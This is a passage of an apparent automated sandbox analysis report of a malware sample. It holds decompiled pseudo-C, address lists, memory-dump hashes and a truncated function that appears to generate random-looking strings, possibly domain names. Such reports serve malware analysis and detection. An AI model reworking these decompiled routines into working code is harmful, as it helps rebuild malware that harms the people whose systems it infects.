                                                                                                                                                                                                                                                                                                        							_t70 =  *0x42199c; // 0x0
                                                                                                                                                                                                                                                                                                        							__eflags = _t70;
                                                                                                                                                                                                                                                                                                        							if(_t70 != 0) {
                                                                                                                                                                                                                                                                                                        								L15:
                                                                                                                                                                                                                                                                                                        								_t93 = 0x42199c;
                                                                                                                                                                                                                                                                                                        								goto L16;
                                                                                                                                                                                                                                                                                                        							} else {
                                                                                                                                                                                                                                                                                                        								_t70 =  *0x4219a0; // 0x0
                                                                                                                                                                                                                                                                                                        								__eflags = _t70;
                                                                                                                                                                                                                                                                                                        								if(_t70 != 0) {
                                                                                                                                                                                                                                                                                                        									goto L15;
                                                                                                                                                                                                                                                                                                        								} else {
                                                                                                                                                                                                                                                                                                        									_t119 =  *0x4219a4; // 0x1
                                                                                                                                                                                                                                                                                                        									_t93 = 0x4219a8;
                                                                                                                                                                                                                                                                                                        									__eflags = _t119;
                                                                                                                                                                                                                                                                                                        									if(_t119 == 0) {
                                                                                                                                                                                                                                                                                                        										L26:
                                                                                                                                                                                                                                                                                                        										_t130 =  *_t93;
                                                                                                                                                                                                                                                                                                        										__eflags =  *_t93;
                                                                                                                                                                                                                                                                                                        										if( *_t93 != 0) {
                                                                                                                                                                                                                                                                                                        											L16:
                                                                                                                                                                                                                                                                                                        											__eflags = _t93 - 0x4219b4;
                                                                                                                                                                                                                                                                                                        											if(_t93 >= 0x4219b4) {
                                                                                                                                                                                                                                                                                                        												goto L14;
                                                                                                                                                                                                                                                                                                        											} else {
                                                                                                                                                                                                                                                                                                        												_v64 =  &_v56;
                                                                                                                                                                                                                                                                                                        												do {
                                                                                                                                                                                                                                                                                                        													_t17 = _t93 + 4; // 0x0
                                                                                                                                                                                                                                                                                                        													_t110 =  *_t17;
                                                                                                                                                                                                                                                                                                        													_t93 = _t93 + 8;
                                                                                                                                                                                                                                                                                                        													_t18 = _t110 + 0x400000; // 0x400000
                                                                                                                                                                                                                                                                                                        													_t19 = _t110 + 0x400000; // 0x905a4d
                                                                                                                                                                                                                                                                                                        													_t20 = _t93 - 8; // 0x4e472820
                                                                                                                                                                                                                                                                                                        													_v56 =  *_t19 +  *_t20;
                                                                                                                                                                                                                                                                                                        													E0040CE80(_t18, _t93, 4, _v64, _t119, _t130);
                                                                                                                                                                                                                                                                                                        													__eflags = _t93 - 0x4219b4;
                                                                                                                                                                                                                                                                                                        												} while (_t93 < 0x4219b4);
                                                                                                                                                                                                                                                                                                        												goto L19;
                                                                                                                                                                                                                                                                                                        											}
                                                                                                                                                                                                                                                                                                        										} else {
                                                                                                                                                                                                                                                                                                        											_t38 = _t93 + 4; // 0x0
                                                                                                                                                                                                                                                                                                        											_t95 =  *_t38;
                                                                                                                                                                                                                                                                                                        											__eflags =  *_t38;
                                                                                                                                                                                                                                                                                                        											if( *_t38 == 0) {
                                                                                                                                                                                                                                                                                                        												goto L8;
                                                                                                                                                                                                                                                                                                        											} else {
                                                                                                                                                                                                                                                                                                        												goto L16;
                                                                                                                                                                                                                                                                                                        											}
                                                                                                                                                                                                                                                                                                        										}
                                                                                                                                                                                                                                                                                                        									} else {
                                                                                                                                                                                                                                                                                                        										_t93 = 0x42199c;
                                                                                                                                                                                                                                                                                                        										L8:
                                                                                                                                                                                                                                                                                                        										_t6 = _t93 + 8; // 0x1
                                                                                                                                                                                                                                                                                                        										_t80 =  *_t6;
                                                                                                                                                                                                                                                                                                        										__eflags = _t80 - 1;
                                                                                                                                                                                                                                                                                                        										if(_t80 != 1) {
                                                                                                                                                                                                                                                                                                        											L35:
                                                                                                                                                                                                                                                                                                        											_v88 = _t80;
                                                                                                                                                                                                                                                                                                        											 *_t147 = "  Unknown pseudo relocation protocol version %d.\n";
                                                                                                                                                                                                                                                                                                        											_t81 = L0040CE20(_t93, _t95, _t109, _t119, _t130);
                                                                                                                                                                                                                                                                                                        											0;
                                                                                                                                                                                                                                                                                                        											0;
                                                                                                                                                                                                                                                                                                        											asm("fninit");
                                                                                                                                                                                                                                                                                                        											return _t81;
                                                                                                                                                                                                                                                                                                        										} else {
                                                                                                                                                                                                                                                                                                        											_t94 = _t93 + 0xc;
                                                                                                                                                                                                                                                                                                        											__eflags = _t94 - 0x4219b4;
                                                                                                                                                                                                                                                                                                        											if(_t94 < 0x4219b4) {
                                                                                                                                                                                                                                                                                                        												do {
                                                                                                                                                                                                                                                                                                        													_t114 =  *_t94;
                                                                                                                                                                                                                                                                                                        													_t7 = _t94 + 4; // 0x312e382e
                                                                                                                                                                                                                                                                                                        													_t121 =  *_t7;
                                                                                                                                                                                                                                                                                                        													_t9 = _t121 + 0x400000; // 0x316e382e
                                                                                                                                                                                                                                                                                                        													_t87 = _t9;
                                                                                                                                                                                                                                                                                                        													_v64 =  *((intOrPtr*)(_t114 + 0x400000));
                                                                                                                                                                                                                                                                                                        													_t11 = _t94 + 8; // 0x0
                                                                                                                                                                                                                                                                                                        													_t100 =  *_t11 & 0x000000ff;
                                                                                                                                                                                                                                                                                                        													__eflags = _t100 - 0x10;
                                                                                                                                                                                                                                                                                                        													if(_t100 == 0x10) {
                                                                                                                                                                                                                                                                                                        														_t101 =  *(_t121 + 0x400000) & 0x0000ffff;
                                                                                                                                                                                                                                                                                                        														_t122 = _t101 & 0x0000ffff;
                                                                                                                                                                                                                                                                                                        														__eflags = _t101;
                                                                                                                                                                                                                                                                                                        														_t123 =  <  ? _t122 | 0xffff0000 : _t122;
                                                                                                                                                                                                                                                                                                        														_t124 = ( <  ? _t122 | 0xffff0000 : _t122) - _t114;
                                                                                                                                                                                                                                                                                                        														_t125 = ( <  ? _t122 | 0xffff0000 : _t122) - _t114 - 0x400000;
                                                                                                                                                                                                                                                                                                        														_v64 =  &_v56;
                                                                                                                                                                                                                                                                                                        														_t135 = _v64 + ( <  ? _t122 | 0xffff0000 : _t122) - _t114 - 0x400000;
                                                                                                                                                                                                                                                                                                        														__eflags = _t135;
                                                                                                                                                                                                                                                                                                        														_v56 = _t135;
                                                                                                                                                                                                                                                                                                        														E0040CE80(_t87, _t94, 2,  &_v56, ( <  ? _t122 | 0xffff0000 : _t122) - _t114 - 0x400000, _t135);
                                                                                                                                                                                                                                                                                                        														goto L30;
                                                                                                                                                                                                                                                                                                        													} else {
                                                                                                                                                                                                                                                                                                        														__eflags = _t100 - 0x20;
                                                                                                                                                                                                                                                                                                        														if(_t100 == 0x20) {
                                                                                                                                                                                                                                                                                                        															_v64 =  &_v56;
                                                                                                                                                                                                                                                                                                        															_t138 = _v64 - _t114 + 0x400000 +  *_t87;
                                                                                                                                                                                                                                                                                                        															_v56 = _v64 - _t114 + 0x400000 +  *_t87;
                                                                                                                                                                                                                                                                                                        															E0040CE80(_t87, _t94, 4,  &_v56, _t121, _v64 - _t114 + 0x400000 +  *_t87); // executed
                                                                                                                                                                                                                                                                                                        															goto L30;
                                                                                                                                                                                                                                                                                                        														} else {
                                                                                                                                                                                                                                                                                                        															__eflags = _t100 - 8;
                                                                                                                                                                                                                                                                                                        															if(_t100 == 8) {
                                                                                                                                                                                                                                                                                                        																_t106 =  *_t87 & 0x000000ff;
                                                                                                                                                                                                                                                                                                        																_t126 = _t106 & 0x000000ff;
                                                                                                                                                                                                                                                                                                        																__eflags = _t106;
                                                                                                                                                                                                                                                                                                        																_t127 =  <  ? _t126 | 0xffffff00 : _t126;
                                                                                                                                                                                                                                                                                                        																_t128 = ( <  ? _t126 | 0xffffff00 : _t126) - 0x400000;
                                                                                                                                                                                                                                                                                                        																_t129 = ( <  ? _t126 | 0xffffff00 : _t126) - 0x400000 - _t114;
                                                                                                                                                                                                                                                                                                        																_t138 = _v64 + ( <  ? _t126 | 0xffffff00 : _t126) - 0x400000 - _t114;
                                                                                                                                                                                                                                                                                                        																_v64 =  &_v56;
                                                                                                                                                                                                                                                                                                        																_v56 = _v64 + ( <  ? _t126 | 0xffffff00 : _t126) - 0x400000 - _t114;
                                                                                                                                                                                                                                                                                                        																E0040CE80(_t87, _t94, 1,  &_v56, ( <  ? _t126 | 0xffffff00 : _t126) - 0x400000 - _t114, _v64 + ( <  ? _t126 | 0xffffff00 : _t126) - 0x400000 - _t114);
                                                                                                                                                                                                                                                                                                        																goto L30;
                                                                                                                                                                                                                                                                                                        															} else {
                                                                                                                                                                                                                                                                                                        																_v88 = _t100;
                                                                                                                                                                                                                                                                                                        																 *_t147 = "  Unknown pseudo relocation bit size %d.\n";
                                                                                                                                                                                                                                                                                                        																_v56 = 0;
                                                                                                                                                                                                                                                                                                        																_t70 = L0040CE20(_t94, _t100, _t114, _t121, _t138);
                                                                                                                                                                                                                                                                                                        																goto L14;
                                                                                                                                                                                                                                                                                                        															}
                                                                                                                                                                                                                                                                                                        														}
                                                                                                                                                                                                                                                                                                        													}
                                                                                                                                                                                                                                                                                                        													goto L37;
                                                                                                                                                                                                                                                                                                        													L30:
                                                                                                                                                                                                                                                                                                        													_t94 = _t94 + 0xc;
                                                                                                                                                                                                                                                                                                        													__eflags = _t94 - 0x4219b4;
                                                                                                                                                                                                                                                                                                        												} while (_t94 < 0x4219b4);
                                                                                                                                                                                                                                                                                                        												L19:
                                                                                                                                                                                                                                                                                                        												_t70 =  *0x422070; // 0x1
                                                                                                                                                                                                                                                                                                        												_t93 = 0;
                                                                                                                                                                                                                                                                                                        												__eflags = _t70;
                                                                                                                                                                                                                                                                                                        												if(_t70 > 0) {
                                                                                                                                                                                                                                                                                                        													do {
                                                                                                                                                                                                                                                                                                        														_t74 =  *0x422074; // 0x64fde0
                                                                                                                                                                                                                                                                                                        														_t130 = _t93 + _t93 * 2;
                                                                                                                                                                                                                                                                                                        														_t119 = _t130 * 4;
                                                                                                                                                                                                                                                                                                        														_t70 = _t74 + _t119;
                                                                                                                                                                                                                                                                                                        														_t109 =  *_t70;
                                                                                                                                                                                                                                                                                                        														__eflags =  *_t70;
                                                                                                                                                                                                                                                                                                        														if( *_t70 == 0) {
                                                                                                                                                                                                                                                                                                        															goto L21;
                                                                                                                                                                                                                                                                                                        														} else {
                                                                                                                                                                                                                                                                                                        															_v84 = 0x1c;
                                                                                                                                                                                                                                                                                                        															_v88 = _v64;
                                                                                                                                                                                                                                                                                                        															_t29 = _t70 + 4; // 0x418aa0
                                                                                                                                                                                                                                                                                                        															 *_t147 =  *_t29;
                                                                                                                                                                                                                                                                                                        															_t76 = VirtualQuery(??, ??, ??);
                                                                                                                                                                                                                                                                                                        															_t147 = _t147 - 0xc;
                                                                                                                                                                                                                                                                                                        															__eflags = _t76;
                                                                                                                                                                                                                                                                                                        															if(_t76 == 0) {
                                                                                                                                                                                                                                                                                                        																_t98 =  *0x422074; // 0x64fde0
                                                                                                                                                                                                                                                                                                        																_t95 = _t98 + _t119;
                                                                                                                                                                                                                                                                                                        																__eflags = _t95;
                                                                                                                                                                                                                                                                                                        																_t55 = _t95 + 4; // 0x418aa0
                                                                                                                                                                                                                                                                                                        																_v84 =  *_t55;
                                                                                                                                                                                                                                                                                                        																_t57 = _t95 + 8; // 0x41910c
                                                                                                                                                                                                                                                                                                        																_t58 =  *_t57 + 8; // 0x10d00ff
                                                                                                                                                                                                                                                                                                        																 *_t147 = "  VirtualQuery failed for %d bytes at address %p";
                                                                                                                                                                                                                                                                                                        																_v88 =  *_t58;
                                                                                                                                                                                                                                                                                                        																_t80 = L0040CE20(_t93, _t95, _t109, _t119, _t130);
                                                                                                                                                                                                                                                                                                        																goto L35;
                                                                                                                                                                                                                                                                                                        															} else {
                                                                                                                                                                                                                                                                                                        																_v80 =  &_v60;
                                                                                                                                                                                                                                                                                                        																_t83 =  *0x422074; // 0x64fde0
                                                                                                                                                                                                                                                                                                        																_v84 =  *((intOrPtr*)(_t83 + _t130 * 4));
                                                                                                                                                                                                                                                                                                        																_v88 = _v44;
                                                                                                                                                                                                                                                                                                        																 *_t147 = _v56; // executed
                                                                                                                                                                                                                                                                                                        																_t70 = VirtualProtect(??, ??, ??, ??); // executed
                                                                                                                                                                                                                                                                                                        																_t147 = _t147 - 0x10;
                                                                                                                                                                                                                                                                                                        																goto L21;
                                                                                                                                                                                                                                                                                                        															}
                                                                                                                                                                                                                                                                                                        														}
                                                                                                                                                                                                                                                                                                        														goto L37;
                                                                                                                                                                                                                                                                                                        														L21:
                                                                                                                                                                                                                                                                                                        														_t93 = _t93 + 1;
                                                                                                                                                                                                                                                                                                        														__eflags = _t93 -  *0x422070; // 0x1
                                                                                                                                                                                                                                                                                                        													} while (__eflags < 0);
                                                                                                                                                                                                                                                                                                        												} else {
                                                                                                                                                                                                                                                                                                        												}
                                                                                                                                                                                                                                                                                                        											}
                                                                                                                                                                                                                                                                                                        											goto L14;
                                                                                                                                                                                                                                                                                                        										}
                                                                                                                                                                                                                                                                                                        									}
                                                                                                                                                                                                                                                                                                        								}
                                                                                                                                                                                                                                                                                                        							}
                                                                                                                                                                                                                                                                                                        						}
                                                                                                                                                                                                                                                                                                        					}
                                                                                                                                                                                                                                                                                                        				} else {
                                                                                                                                                                                                                                                                                                        					return _t61;
                                                                                                                                                                                                                                                                                                        				}
                                                                                                                                                                                                                                                                                                        				L37:
                                                                                                                                                                                                                                                                                                        			}



































                                                                                                                                                                                                                                                                                                        0x0040d0c0
                                                                                                                                                                                                                                                                                                        0x0040d0c0
                                                                                                                                                                                                                                                                                                        0x0040d0c0
                                                                                                                                                                                                                                                                                                        0x0040d0c7
                                                                                                                                                                                                                                                                                                        0x0040d0d3
                                                                                                                                                                                                                                                                                                        0x0040d0d4
                                                                                                                                                                                                                                                                                                        0x0040d0d9
                                                                                                                                                                                                                                                                                                        0x0040d0f5
                                                                                                                                                                                                                                                                                                        0x0040d0fa
                                                                                                                                                                                                                                                                                                        0x0040d104
                                                                                                                                                                                                                                                                                                        0x0040d10d
                                                                                                                                                                                                                                                                                                        0x0040d117
                                                                                                                                                                                                                                                                                                        0x0040d11c
                                                                                                                                                                                                                                                                                                        0x0040d11f
                                                                                                                                                                                                                                                                                                        0x0040d1c1
                                                                                                                                                                                                                                                                                                        0x0040d1c8
                                                                                                                                                                                                                                                                                                        0x0040d125
                                                                                                                                                                                                                                                                                                        0x0040d125
                                                                                                                                                                                                                                                                                                        0x0040d128
                                                                                                                                                                                                                                                                                                        0x0040d293
                                                                                                                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                                                                                                                        0x0040d12e
                                                                                                                                                                                                                                                                                                        0x0040d12e
                                                                                                                                                                                                                                                                                                        0x0040d133
                                                                                                                                                                                                                                                                                                        0x0040d135
                                                                                                                                                                                                                                                                                                        0x0040d1c9
                                                                                                                                                                                                                                                                                                        0x0040d1c9
                                                                                                                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                                                                                                                        0x0040d13b
                                                                                                                                                                                                                                                                                                        0x0040d13b
                                                                                                                                                                                                                                                                                                        0x0040d140
                                                                                                                                                                                                                                                                                                        0x0040d142
                                                                                                                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                                                                                                                        0x0040d148
                                                                                                                                                                                                                                                                                                        0x0040d148
                                                                                                                                                                                                                                                                                                        0x0040d14e
                                                                                                                                                                                                                                                                                                        0x0040d153
                                                                                                                                                                                                                                                                                                        0x0040d155
                                                                                                                                                                                                                                                                                                        0x0040d298
                                                                                                                                                                                                                                                                                                        0x0040d298
                                                                                                                                                                                                                                                                                                        0x0040d29a
                                                                                                                                                                                                                                                                                                        0x0040d29c
                                                                                                                                                                                                                                                                                                        0x0040d1ce
                                                                                                                                                                                                                                                                                                        0x0040d1ce
                                                                                                                                                                                                                                                                                                        0x0040d1d4
                                                                                                                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                                                                                                                        0x0040d1d6
                                                                                                                                                                                                                                                                                                        0x0040d1d9
                                                                                                                                                                                                                                                                                                        0x0040d1e0
                                                                                                                                                                                                                                                                                                        0x0040d1e0
                                                                                                                                                                                                                                                                                                        0x0040d1e0
                                                                                                                                                                                                                                                                                                        0x0040d1e8
                                                                                                                                                                                                                                                                                                        0x0040d1eb
                                                                                                                                                                                                                                                                                                        0x0040d1f1
                                                                                                                                                                                                                                                                                                        0x0040d1f7
                                                                                                                                                                                                                                                                                                        0x0040d1fa
                                                                                                                                                                                                                                                                                                        0x0040d200
                                                                                                                                                                                                                                                                                                        0x0040d205
                                                                                                                                                                                                                                                                                                        0x0040d205
                                                                                                                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                                                                                                                        0x0040d1e0
                                                                                                                                                                                                                                                                                                        0x0040d2a2
                                                                                                                                                                                                                                                                                                        0x0040d2a2
                                                                                                                                                                                                                                                                                                        0x0040d2a2
                                                                                                                                                                                                                                                                                                        0x0040d2a5
                                                                                                                                                                                                                                                                                                        0x0040d2a7
                                                                                                                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                                                                                                                        0x0040d2ad
                                                                                                                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                                                                                                                        0x0040d2ad
                                                                                                                                                                                                                                                                                                        0x0040d2a7
                                                                                                                                                                                                                                                                                                        0x0040d15b
                                                                                                                                                                                                                                                                                                        0x0040d15b
                                                                                                                                                                                                                                                                                                        0x0040d160
                                                                                                                                                                                                                                                                                                        0x0040d160
                                                                                                                                                                                                                                                                                                        0x0040d160
                                                                                                                                                                                                                                                                                                        0x0040d163
                                                                                                                                                                                                                                                                                                        0x0040d166
                                                                                                                                                                                                                                                                                                        0x0040d383
                                                                                                                                                                                                                                                                                                        0x0040d383
                                                                                                                                                                                                                                                                                                        0x0040d387
                                                                                                                                                                                                                                                                                                        0x0040d38e
                                                                                                                                                                                                                                                                                                        0x0040d399
                                                                                                                                                                                                                                                                                                        0x0040d39d
                                                                                                                                                                                                                                                                                                        0x0040d3a0
                                                                                                                                                                                                                                                                                                        0x0040d3a2
                                                                                                                                                                                                                                                                                                        0x0040d16c
                                                                                                                                                                                                                                                                                                        0x0040d16c
                                                                                                                                                                                                                                                                                                        0x0040d16f
                                                                                                                                                                                                                                                                                                        0x0040d175
                                                                                                                                                                                                                                                                                                        0x0040d177
                                                                                                                                                                                                                                                                                                        0x0040d177
                                                                                                                                                                                                                                                                                                        0x0040d179
                                                                                                                                                                                                                                                                                                        0x0040d179
                                                                                                                                                                                                                                                                                                        0x0040d182
                                                                                                                                                                                                                                                                                                        0x0040d182
                                                                                                                                                                                                                                                                                                        0x0040d188
                                                                                                                                                                                                                                                                                                        0x0040d18b
                                                                                                                                                                                                                                                                                                        0x0040d18b
                                                                                                                                                                                                                                                                                                        0x0040d18f
                                                                                                                                                                                                                                                                                                        0x0040d192
                                                                                                                                                                                                                                                                                                        0x0040d2b2
                                                                                                                                                                                                                                                                                                        0x0040d2b9
                                                                                                                                                                                                                                                                                                        0x0040d2c4
                                                                                                                                                                                                                                                                                                        0x0040d2c7
                                                                                                                                                                                                                                                                                                        0x0040d2cd
                                                                                                                                                                                                                                                                                                        0x0040d2d2
                                                                                                                                                                                                                                                                                                        0x0040d2d8
                                                                                                                                                                                                                                                                                                        0x0040d2e3
                                                                                                                                                                                                                                                                                                        0x0040d2e3
                                                                                                                                                                                                                                                                                                        0x0040d2e5
                                                                                                                                                                                                                                                                                                        0x0040d2e8
                                                                                                                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                                                                                                                        0x0040d198
                                                                                                                                                                                                                                                                                                        0x0040d198
                                                                                                                                                                                                                                                                                                        0x0040d19b
                                                                                                                                                                                                                                                                                                        0x0040d345
                                                                                                                                                                                                                                                                                                        0x0040d34f
                                                                                                                                                                                                                                                                                                        0x0040d354
                                                                                                                                                                                                                                                                                                        0x0040d357
                                                                                                                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                                                                                                                        0x0040d1a1
                                                                                                                                                                                                                                                                                                        0x0040d1a1
                                                                                                                                                                                                                                                                                                        0x0040d1a4
                                                                                                                                                                                                                                                                                                        0x0040d301
                                                                                                                                                                                                                                                                                                        0x0040d304
                                                                                                                                                                                                                                                                                                        0x0040d30f
                                                                                                                                                                                                                                                                                                        0x0040d311
                                                                                                                                                                                                                                                                                                        0x0040d317
                                                                                                                                                                                                                                                                                                        0x0040d31d
                                                                                                                                                                                                                                                                                                        0x0040d322
                                                                                                                                                                                                                                                                                                        0x0040d324
                                                                                                                                                                                                                                                                                                        0x0040d32f
                                                                                                                                                                                                                                                                                                        0x0040d332
                                                                                                                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                                                                                                                        0x0040d1aa
                                                                                                                                                                                                                                                                                                        0x0040d1aa
                                                                                                                                                                                                                                                                                                        0x0040d1ae
                                                                                                                                                                                                                                                                                                        0x0040d1b5
                                                                                                                                                                                                                                                                                                        0x0040d1bc
                                                                                                                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                                                                                                                        0x0040d1bc
                                                                                                                                                                                                                                                                                                        0x0040d1a4
                                                                                                                                                                                                                                                                                                        0x0040d19b
                                                                                                                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                                                                                                                        0x0040d2ed
                                                                                                                                                                                                                                                                                                        0x0040d2ed
                                                                                                                                                                                                                                                                                                        0x0040d2f0
                                                                                                                                                                                                                                                                                                        0x0040d2f0
                                                                                                                                                                                                                                                                                                        0x0040d20d
                                                                                                                                                                                                                                                                                                        0x0040d20d
                                                                                                                                                                                                                                                                                                        0x0040d212
                                                                                                                                                                                                                                                                                                        0x0040d214
                                                                                                                                                                                                                                                                                                        0x0040d216
                                                                                                                                                                                                                                                                                                        0x0040d22b
                                                                                                                                                                                                                                                                                                        0x0040d22b
                                                                                                                                                                                                                                                                                                        0x0040d230
                                                                                                                                                                                                                                                                                                        0x0040d233
                                                                                                                                                                                                                                                                                                        0x0040d23a
                                                                                                                                                                                                                                                                                                        0x0040d23c
                                                                                                                                                                                                                                                                                                        0x0040d23e
                                                                                                                                                                                                                                                                                                        0x0040d240
                                                                                                                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                                                                                                                        0x0040d242
                                                                                                                                                                                                                                                                                                        0x0040d245
                                                                                                                                                                                                                                                                                                        0x0040d24d
                                                                                                                                                                                                                                                                                                        0x0040d251
                                                                                                                                                                                                                                                                                                        0x0040d254
                                                                                                                                                                                                                                                                                                        0x0040d257
                                                                                                                                                                                                                                                                                                        0x0040d25d
                                                                                                                                                                                                                                                                                                        0x0040d260
                                                                                                                                                                                                                                                                                                        0x0040d262
                                                                                                                                                                                                                                                                                                        0x0040d35e
                                                                                                                                                                                                                                                                                                        0x0040d364
                                                                                                                                                                                                                                                                                                        0x0040d364
                                                                                                                                                                                                                                                                                                        0x0040d366
                                                                                                                                                                                                                                                                                                        0x0040d369
                                                                                                                                                                                                                                                                                                        0x0040d36d
                                                                                                                                                                                                                                                                                                        0x0040d370
                                                                                                                                                                                                                                                                                                        0x0040d373
                                                                                                                                                                                                                                                                                                        0x0040d37a
                                                                                                                                                                                                                                                                                                        0x0040d37e
                                                                                                                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                                                                                                                        0x0040d268
                                                                                                                                                                                                                                                                                                        0x0040d26b
                                                                                                                                                                                                                                                                                                        0x0040d26f
                                                                                                                                                                                                                                                                                                        0x0040d277
                                                                                                                                                                                                                                                                                                        0x0040d27e
                                                                                                                                                                                                                                                                                                        0x0040d285
                                                                                                                                                                                                                                                                                                        0x0040d288
                                                                                                                                                                                                                                                                                                        0x0040d28e
                                                                                                                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                                                                                                                        0x0040d28e
                                                                                                                                                                                                                                                                                                        0x0040d262
                                                                                                                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                                                                                                                        0x0040d220
                                                                                                                                                                                                                                                                                                        0x0040d220
                                                                                                                                                                                                                                                                                                        0x0040d223
                                                                                                                                                                                                                                                                                                        0x0040d223
                                                                                                                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                                                                                                                        0x0040d218
                                                                                                                                                                                                                                                                                                        0x0040d216
                                                                                                                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                                                                                                                        0x0040d175
                                                                                                                                                                                                                                                                                                        0x0040d166
                                                                                                                                                                                                                                                                                                        0x0040d155
                                                                                                                                                                                                                                                                                                        0x0040d142
                                                                                                                                                                                                                                                                                                        0x0040d135
                                                                                                                                                                                                                                                                                                        0x0040d128
                                                                                                                                                                                                                                                                                                        0x0040d0c9
                                                                                                                                                                                                                                                                                                        0x0040d0c9
                                                                                                                                                                                                                                                                                                        0x0040d0c9
                                                                                                                                                                                                                                                                                                        0x00000000

                                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                                        • Source File: 00000000.00000002.630613479.0000000000402000.00000080.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.630299651.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.630481096.0000000000401000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.631291929.000000000041F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.631468354.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.631586633.0000000000423000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.631856136.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.631956687.000000000042E000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.632480755.0000000000444000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_400000_6gjnnBAbpc.jbxd
                                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                                                                        • API String ID:
                                                                                                                                                                                                                                                                                                        • Opcode ID: 6dc5d2d502416e41f7d9eddc792febd8f4f97fcbe738563a939ef138da5529d8
                                                                                                                                                                                                                                                                                                        • Instruction ID: c9f2d9c8f812e7c608e2c1f9d0c6a3859adaa46158f161601ba7db1d9c1a457c
                                                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 6dc5d2d502416e41f7d9eddc792febd8f4f97fcbe738563a939ef138da5529d8
                                                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 6F719F71E012149FCB14CFA9E9807ADB7F1EF44304F54827BE845AB3A5DB389949CB89
                                                                                                                                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                                        C-Code - Quality: 100%
                                                                                                                                                                                                                                                                                                        			E04009400(intOrPtr _a4, intOrPtr _a8, intOrPtr _a12) {
                                                                                                                                                                                                                                                                                                        				char _v8;
                                                                                                                                                                                                                                                                                                        				signed int _v12;
                                                                                                                                                                                                                                                                                                        				signed int _v16;
                                                                                                                                                                                                                                                                                                        				signed int _v20;
                                                                                                                                                                                                                                                                                                        				signed int _v24;
                                                                                                                                                                                                                                                                                                        				signed int _v28;
                                                                                                                                                                                                                                                                                                        				signed int _v32;
                                                                                                                                                                                                                                                                                                        				intOrPtr _v36;
                                                                                                                                                                                                                                                                                                        				intOrPtr _v40;
                                                                                                                                                                                                                                                                                                        				char _v91;
                                                                                                                                                                                                                                                                                                        				char _v92;
                                                                                                                                                                                                                                                                                                        				char _v220;
                                                                                                                                                                                                                                                                                                        				intOrPtr _t59;
                                                                                                                                                                                                                                                                                                        				void* _t103;
                                                                                                                                                                                                                                                                                                        				void* _t104;
                                                                                                                                                                                                                                                                                                        				void* _t106;
                                                                                                                                                                                                                                                                                                        
                                                                                                                                                                                                                                                                                                        				_v8 = 0;
                                                                                                                                                                                                                                                                                                        				if(_a4 != 0 && _a8 != 0 && _a12 > 0) {
                                                                                                                                                                                                                                                                                                        					_t56 = E04007B70( &_v28, _a4 + 0x45b, 0x10);
                                                                                                                                                                                                                                                                                                        					_t104 = _t103 + 0xc;
                                                                                                                                                                                                                                                                                                        					_v12 = _v28 ^ _v24 ^ _v20 ^ _v16;
                                                                                                                                                                                                                                                                                                        					_v32 = 0;
                                                                                                                                                                                                                                                                                                        					while(_v32 < _a12) {
                                                                                                                                                                                                                                                                                                        						E04007D20(_t56,  &_v220, 0, 0x80);
                                                                                                                                                                                                                                                                                                        						_t59 = E04008BB0( &_v12, 4,  &_v220, 0x80); // executed
                                                                                                                                                                                                                                                                                                        						_t106 = _t104 + 0x1c;
                                                                                                                                                                                                                                                                                                        						_v40 = _t59;
                                                                                                                                                                                                                                                                                                        						if(_v40 <= 0) {
                                                                                                                                                                                                                                                                                                        							_v12 = _v32 * 7 + _v12;
                                                                                                                                                                                                                                                                                                        						} else {
                                                                                                                                                                                                                                                                                                        							_v12 = _v220;
                                                                                                                                                                                                                                                                                                        						}
                                                                                                                                                                                                                                                                                                        						_v36 = _v12 % 4 + 9;
                                                                                                                                                                                                                                                                                                        						E04009650( &_v220, _v40, _v32 * 0x1e + _a8, _v36);
                                                                                                                                                                                                                                                                                                        						E04007D20( &_v92,  &_v92, 0, 0x32);
                                                                                                                                                                                                                                                                                                        						_t104 = _t106 + 0x1c;
                                                                                                                                                                                                                                                                                                        						lstrcpyA( &_v92, _v32 * 0x1e + _a8);
                                                                                                                                                                                                                                                                                                        						_v91 = 0;
                                                                                                                                                                                                                                                                                                        						CharUpperA( &_v92);
